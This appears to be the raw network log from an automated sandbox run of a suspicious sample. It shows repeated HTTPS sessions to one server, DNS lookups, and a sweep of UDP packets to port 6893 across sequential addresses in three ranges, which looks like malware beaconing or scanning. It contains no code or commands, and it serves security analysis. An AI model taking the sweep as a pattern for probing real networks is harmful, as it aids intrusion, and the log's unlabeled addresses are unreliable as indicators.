                                                                                                        Sep 29, 2022 14:46:40.596549988 CEST49800443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:40.596568108 CEST44349800140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:40.596609116 CEST49800443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:40.597029924 CEST49800443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:40.808473110 CEST49802443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:40.808538914 CEST44349802140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:40.808624983 CEST49802443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:40.808923960 CEST49802443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:40.808948040 CEST44349802140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:40.849219084 CEST44349802140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:40.851469994 CEST49802443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:40.851511955 CEST44349802140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:40.882741928 CEST44349802140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:40.882855892 CEST44349802140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:40.882940054 CEST49802443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:40.882957935 CEST44349802140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:40.883002043 CEST49802443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:40.883331060 CEST49802443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:41.059359074 CEST49804443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:41.059423923 CEST44349804140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:41.059525967 CEST49804443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:41.236833096 CEST49804443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:41.236874104 CEST44349804140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:41.278439045 CEST44349804140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:41.280066967 CEST49804443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:41.280102015 CEST44349804140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:41.327935934 CEST44349804140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:41.328138113 CEST44349804140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:41.328242064 CEST44349804140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:41.328438997 CEST49804443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:41.328520060 CEST49804443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:41.329839945 CEST49804443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:42.925021887 CEST49807443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:42.925092936 CEST44349807140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:42.925209999 CEST49807443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:42.925457001 CEST49807443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:42.925472975 CEST44349807140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:42.968565941 CEST44349807140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:42.971220016 CEST49807443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:42.971302986 CEST44349807140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.370193958 CEST44349807140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.370270967 CEST44349807140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.370337963 CEST44349807140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.370450974 CEST49807443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:43.370507002 CEST49807443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:43.370894909 CEST49807443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:43.605880022 CEST49809443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:43.605947018 CEST44349809140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.606070995 CEST49809443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:43.606408119 CEST49809443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:43.606429100 CEST44349809140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.647336006 CEST44349809140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.648763895 CEST49809443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:43.648792028 CEST44349809140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.683741093 CEST44349809140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.683830023 CEST44349809140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.683898926 CEST44349809140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:43.683919907 CEST49809443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:43.683958054 CEST49809443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:43.684513092 CEST49809443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.243360043 CEST49811443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.243426085 CEST44349811140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.243558884 CEST49811443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.243874073 CEST49811443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.243895054 CEST44349811140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.289907932 CEST44349811140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.291384935 CEST49811443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.291425943 CEST44349811140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.327084064 CEST44349811140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.327234030 CEST44349811140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.327336073 CEST44349811140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.327353954 CEST49811443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.327392101 CEST49811443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.329664946 CEST49811443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.573895931 CEST49813443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.573949099 CEST44349813140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.574079037 CEST49813443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.574373960 CEST49813443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.574389935 CEST44349813140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.615217924 CEST44349813140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.616413116 CEST49813443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.616432905 CEST44349813140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.648349047 CEST44349813140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.648430109 CEST44349813140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.648504972 CEST44349813140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:44.648557901 CEST49813443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.648854971 CEST49813443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:44.648854971 CEST49813443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:46.298825026 CEST49822443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:46.298932076 CEST44349822140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.299065113 CEST49822443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:46.309966087 CEST49822443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:46.310039997 CEST44349822140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.352844954 CEST44349822140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.355212927 CEST49822443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:46.355313063 CEST44349822140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.385265112 CEST44349822140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.385411024 CEST44349822140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.385479927 CEST49822443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:46.385500908 CEST44349822140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.385526896 CEST49822443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:46.385540962 CEST49822443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:46.385915041 CEST49822443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:47.633831978 CEST49825443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:47.633929014 CEST44349825140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:47.634074926 CEST49825443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:47.634308100 CEST49825443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:47.634346008 CEST44349825140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:47.677859068 CEST44349825140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:47.715361118 CEST49825443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:47.715399981 CEST44349825140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:47.733983040 CEST44349825140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:47.734100103 CEST44349825140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:47.734199047 CEST44349825140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:47.734198093 CEST49825443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:47.734252930 CEST49825443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:47.734757900 CEST49825443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.227303028 CEST49827443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.227361917 CEST44349827140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:49.227488041 CEST49827443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.227731943 CEST49827443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.227750063 CEST44349827140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:49.267617941 CEST44349827140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:49.269680977 CEST49827443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.269716978 CEST44349827140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:49.301846981 CEST44349827140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:49.301950932 CEST44349827140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:49.302027941 CEST44349827140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:49.302093029 CEST49827443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.302123070 CEST49827443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.310780048 CEST49827443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.865375042 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.865454912 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:49.865586042 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.865791082 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.865809917 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:49.908911943 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:49.910136938 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:49.910195112 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.167296886 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.167589903 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.167665958 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.167686939 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.167714119 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.167762041 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.167773962 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.167826891 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.167872906 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.167882919 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.167921066 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.167965889 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.185173035 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185308933 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185363054 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185378075 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.185405970 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185466051 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185498953 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.185518026 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185576916 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185585976 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.185604095 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185667992 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185669899 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.185688019 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185750961 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185765982 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.185781956 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185837030 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185842991 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.185858965 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185926914 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.185937881 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.185955048 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.186033964 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.186041117 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.186053991 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.186127901 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.186144114 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.202853918 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.202959061 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203026056 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203074932 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.203082085 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203139067 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203171968 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.203205109 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.203211069 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203229904 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203299999 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.203486919 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203586102 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203640938 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203654051 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.203672886 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203732014 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.203743935 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203759909 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203819036 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.203831911 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203888893 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203938007 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.203943014 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.203957081 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204010010 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.204022884 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204090118 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204144001 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204153061 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.204166889 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204220057 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.204226971 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204241991 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204305887 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.204319954 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204372883 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204423904 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.204425097 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204438925 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204484940 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.204498053 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204555035 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204608917 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.204617977 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204631090 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.204685926 CEST49829443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:46:50.204700947 CEST44349829140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:46:50.210298061 CEST49829443192.168.2.4140.82.121.3
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Sep 29, 2022 14:44:59.642365932 CEST6416753192.168.2.48.8.8.8
                                                                                                        Sep 29, 2022 14:44:59.661982059 CEST53641678.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.345206976 CEST5856553192.168.2.48.8.8.8
                                                                                                        Sep 29, 2022 14:45:00.363078117 CEST53585658.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:45:15.538371086 CEST585666893192.168.2.493.107.12.0
                                                                                                        Sep 29, 2022 14:45:15.538516998 CEST585666893192.168.2.493.107.12.2
                                                                                                        Sep 29, 2022 14:45:15.538516045 CEST585666893192.168.2.493.107.12.1
                                                                                                        Sep 29, 2022 14:45:15.538569927 CEST585666893192.168.2.493.107.12.3
                                                                                                        Sep 29, 2022 14:45:15.538800001 CEST585666893192.168.2.493.107.12.4
                                                                                                        Sep 29, 2022 14:45:15.539098978 CEST585666893192.168.2.493.107.12.6
                                                                                                        Sep 29, 2022 14:45:15.539103031 CEST585666893192.168.2.493.107.12.5
                                                                                                        Sep 29, 2022 14:45:15.539159060 CEST585666893192.168.2.493.107.12.7
                                                                                                        Sep 29, 2022 14:45:15.539271116 CEST585666893192.168.2.493.107.12.8
                                                                                                        Sep 29, 2022 14:45:15.539292097 CEST585666893192.168.2.493.107.12.9
                                                                                                        Sep 29, 2022 14:45:15.539385080 CEST585666893192.168.2.493.107.12.10
                                                                                                        Sep 29, 2022 14:45:15.539484024 CEST585666893192.168.2.493.107.12.11
                                                                                                        Sep 29, 2022 14:45:15.540247917 CEST585666893192.168.2.493.107.12.12
                                                                                                        Sep 29, 2022 14:45:15.540256977 CEST585666893192.168.2.493.107.12.13
                                                                                                        Sep 29, 2022 14:45:15.540399075 CEST585666893192.168.2.493.107.12.15
                                                                                                        Sep 29, 2022 14:45:15.540692091 CEST585666893192.168.2.493.107.12.18
                                                                                                        Sep 29, 2022 14:45:15.540698051 CEST585666893192.168.2.493.107.12.17
                                                                                                        Sep 29, 2022 14:45:15.540802002 CEST585666893192.168.2.493.107.12.19
                                                                                                        Sep 29, 2022 14:45:15.540894032 CEST585666893192.168.2.493.107.12.20
                                                                                                        Sep 29, 2022 14:45:15.541002035 CEST585666893192.168.2.493.107.12.21
                                                                                                        Sep 29, 2022 14:45:15.541182041 CEST585666893192.168.2.493.107.12.23
                                                                                                        Sep 29, 2022 14:45:15.541388035 CEST585666893192.168.2.493.107.12.24
                                                                                                        Sep 29, 2022 14:45:15.541446924 CEST585666893192.168.2.493.107.12.14
                                                                                                        Sep 29, 2022 14:45:15.541448116 CEST585666893192.168.2.493.107.12.16
                                                                                                        Sep 29, 2022 14:45:15.541641951 CEST585666893192.168.2.493.107.12.22
                                                                                                        Sep 29, 2022 14:45:15.541697025 CEST585666893192.168.2.493.107.12.27
                                                                                                        Sep 29, 2022 14:45:15.541702032 CEST585666893192.168.2.493.107.12.25
                                                                                                        Sep 29, 2022 14:45:15.541706085 CEST585666893192.168.2.493.107.12.26
                                                                                                        Sep 29, 2022 14:45:15.541800976 CEST585666893192.168.2.493.107.12.28
                                                                                                        Sep 29, 2022 14:45:15.541910887 CEST585666893192.168.2.493.107.12.29
                                                                                                        Sep 29, 2022 14:45:15.542001009 CEST585666893192.168.2.493.107.12.30
                                                                                                        Sep 29, 2022 14:45:15.542084932 CEST585666893192.168.2.493.107.12.31
                                                                                                        Sep 29, 2022 14:45:15.542362928 CEST585666893192.168.2.495.1.200.1
                                                                                                        Sep 29, 2022 14:45:15.542372942 CEST585666893192.168.2.495.1.200.0
                                                                                                        Sep 29, 2022 14:45:15.542398930 CEST585666893192.168.2.495.1.200.2
                                                                                                        Sep 29, 2022 14:45:15.542660952 CEST585666893192.168.2.495.1.200.4
                                                                                                        Sep 29, 2022 14:45:15.542766094 CEST585666893192.168.2.495.1.200.5
                                                                                                        Sep 29, 2022 14:45:15.542855978 CEST585666893192.168.2.495.1.200.6
                                                                                                        Sep 29, 2022 14:45:15.542949915 CEST585666893192.168.2.495.1.200.3
                                                                                                        Sep 29, 2022 14:45:15.542951107 CEST585666893192.168.2.495.1.200.7
                                                                                                        Sep 29, 2022 14:45:15.543046951 CEST585666893192.168.2.495.1.200.8
                                                                                                        Sep 29, 2022 14:45:15.543144941 CEST585666893192.168.2.495.1.200.9
                                                                                                        Sep 29, 2022 14:45:15.543246984 CEST585666893192.168.2.495.1.200.10
                                                                                                        Sep 29, 2022 14:45:15.543333054 CEST585666893192.168.2.495.1.200.11
                                                                                                        Sep 29, 2022 14:45:15.543462038 CEST585666893192.168.2.495.1.200.12
                                                                                                        Sep 29, 2022 14:45:15.543566942 CEST585666893192.168.2.495.1.200.13
                                                                                                        Sep 29, 2022 14:45:15.543934107 CEST585666893192.168.2.495.1.200.14
                                                                                                        Sep 29, 2022 14:45:15.543934107 CEST585666893192.168.2.495.1.200.16
                                                                                                        Sep 29, 2022 14:45:15.543951035 CEST585666893192.168.2.495.1.200.15
                                                                                                        Sep 29, 2022 14:45:15.544047117 CEST585666893192.168.2.495.1.200.17
                                                                                                        Sep 29, 2022 14:45:15.544215918 CEST585666893192.168.2.495.1.200.19
                                                                                                        Sep 29, 2022 14:45:15.544321060 CEST585666893192.168.2.495.1.200.20
                                                                                                        Sep 29, 2022 14:45:15.544408083 CEST585666893192.168.2.495.1.200.21
                                                                                                        Sep 29, 2022 14:45:15.544425964 CEST585666893192.168.2.495.1.200.18
                                                                                                        Sep 29, 2022 14:45:15.544497013 CEST585666893192.168.2.495.1.200.22
                                                                                                        Sep 29, 2022 14:45:15.544608116 CEST585666893192.168.2.495.1.200.23
                                                                                                        Sep 29, 2022 14:45:15.544701099 CEST585666893192.168.2.495.1.200.24
                                                                                                        Sep 29, 2022 14:45:15.544786930 CEST585666893192.168.2.495.1.200.25
                                                                                                        Sep 29, 2022 14:45:15.544888973 CEST585666893192.168.2.495.1.200.26
                                                                                                        Sep 29, 2022 14:45:15.544989109 CEST585666893192.168.2.495.1.200.27
                                                                                                        Sep 29, 2022 14:45:15.545120001 CEST585666893192.168.2.495.1.200.28
                                                                                                        Sep 29, 2022 14:45:15.545370102 CEST585666893192.168.2.495.1.200.30
                                                                                                        Sep 29, 2022 14:45:15.545452118 CEST585666893192.168.2.495.1.200.31
                                                                                                        Sep 29, 2022 14:45:15.545486927 CEST585666893192.168.2.495.1.200.29
                                                                                                        Sep 29, 2022 14:45:15.545651913 CEST585666893192.168.2.487.98.176.1
                                                                                                        Sep 29, 2022 14:45:15.545734882 CEST585666893192.168.2.487.98.176.2
                                                                                                        Sep 29, 2022 14:45:15.545850992 CEST585666893192.168.2.487.98.176.3
                                                                                                        Sep 29, 2022 14:45:15.545921087 CEST585666893192.168.2.487.98.176.4
                                                                                                        Sep 29, 2022 14:45:15.546030998 CEST585666893192.168.2.487.98.176.5
                                                                                                        Sep 29, 2022 14:45:15.546067953 CEST585666893192.168.2.487.98.176.0
                                                                                                        Sep 29, 2022 14:45:15.546107054 CEST585666893192.168.2.487.98.176.6
                                                                                                        Sep 29, 2022 14:45:15.546226978 CEST585666893192.168.2.487.98.176.7
                                                                                                        Sep 29, 2022 14:45:15.546356916 CEST585666893192.168.2.487.98.176.8
                                                                                                        Sep 29, 2022 14:45:15.546452999 CEST585666893192.168.2.487.98.176.9
                                                                                                        Sep 29, 2022 14:45:15.546570063 CEST585666893192.168.2.487.98.176.10
                                                                                                        Sep 29, 2022 14:45:15.546667099 CEST585666893192.168.2.487.98.176.11
                                                                                                        Sep 29, 2022 14:45:15.546778917 CEST585666893192.168.2.487.98.176.12
                                                                                                        Sep 29, 2022 14:45:15.546904087 CEST585666893192.168.2.487.98.176.13
                                                                                                        Sep 29, 2022 14:45:15.546988010 CEST585666893192.168.2.487.98.176.14
                                                                                                        Sep 29, 2022 14:45:15.547209024 CEST585666893192.168.2.487.98.176.16
                                                                                                        Sep 29, 2022 14:45:15.547307014 CEST585666893192.168.2.487.98.176.15
